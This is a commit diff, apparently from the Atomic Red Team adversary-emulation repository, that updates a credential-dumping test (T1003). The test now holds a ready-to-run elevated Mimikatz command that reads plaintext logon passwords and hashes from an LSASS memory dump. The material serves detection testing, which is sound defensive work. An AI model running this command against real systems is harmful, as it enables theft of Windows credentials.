security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-12-30 15:19:21 +00:00
parent fc060f9e92
commit eac69aa2d9
2 changed files with 17 additions and 23 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1003/T1003.md
+6 -12
View File
@@ -315,19 +315,13 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp|
#### Run it with these steps!
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
| mimikatz_binary_path | Path of the Mimikatz binary | string | $PathToAtomicsFolder\T1003\bin\mimikatz.exe|
| input_file | Path of the Lsass dump | Path | C:\Windows\Temp\lsass_dump.dmp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
#{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
atomics/index.yaml
+11 -11
View File
@@ -19532,21 +19532,21 @@ credential-access:
supported_platforms:
- windows
input_arguments:
mimikatz_binary_path:
description: Path of the Mimikatz binary
type: string
default: "$PathToAtomicsFolder\\T1003\\bin\\mimikatz.exe"
input_file:
description: Path where resulting dump should be placed
description: Path of the Lsass dump
type: Path
default: lsass_dump.dmp
default: C:\Windows\Temp\lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
name: command_prompt
elevation_required: true
command: '#{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
full" exit
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
'
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability